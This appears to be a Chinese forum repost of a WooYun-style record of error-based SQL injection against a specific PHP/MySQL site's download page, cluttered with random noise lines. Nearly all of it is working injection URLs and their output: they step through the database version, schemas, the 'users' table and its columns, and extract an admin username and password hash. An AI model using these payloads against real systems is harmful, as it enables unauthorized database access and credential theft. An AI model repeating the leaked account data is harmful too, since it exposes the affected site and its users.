php+mysql高级爆错注入经测算有效

admin

http://www.wooyun.org/bugs/wooyun-2010-01666
6 p  ^, r0 x- I& K: J0 y7 W. q
之前想找个测试 没想到这有 可以测试下做个记录而已
, O; H6 X7 u( {  @+ M
; \& C* ]7 \" r4 A+ C2 J4 mhttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
# c2 e1 E  D1 K, T
5 m0 o+ o( m% r/data0/htdocs/leqi_new/app/myapp.php

或者
- m, }4 W0 G/ S' F4 w  ?) Y* F
. L  P! [5 D: ]/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/  
  s5 O% m* p) ], Z$ [http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/  leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
  M9 U- I3 \* b+ w
/**********limit依次递归爆库**********/
  D. {# f/ o4 w% ]4 ]+ Whttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/ r. c1 d% c& zinformation_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
7 `" r! `4 r7 G/ H# a2 thttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
, U, w  K/ h& [* _2 C* W& D2 }2 \# ptest
" D' B: d1 x8 R4 n% {
0 J9 z  I3 N( l3 q- ~" S+ J/**********limit依次递归爆表名**********/
# T. @$ p& ^) a4 Zhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users
. C# @* S1 c# [6 U" f' m/ X
; W) G, Z/ G5 X! [' ^3 U! w/**********limit依次递归爆字段名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
/ L" Z- G, [$ l11 21
9 o7 p. s2 z8 n) [. thttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
8 C0 s  H. O  S11 341 351 361
/**********爆数据**********/
/ q4 Y) {2 j  ]5 G* u3 Jhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
" l. j+ y6 ~+ h3 j, Z0 ~6 O7 G6a8b4574ca231eb8bd52764d4978ffcd


. E" ?- S& j; \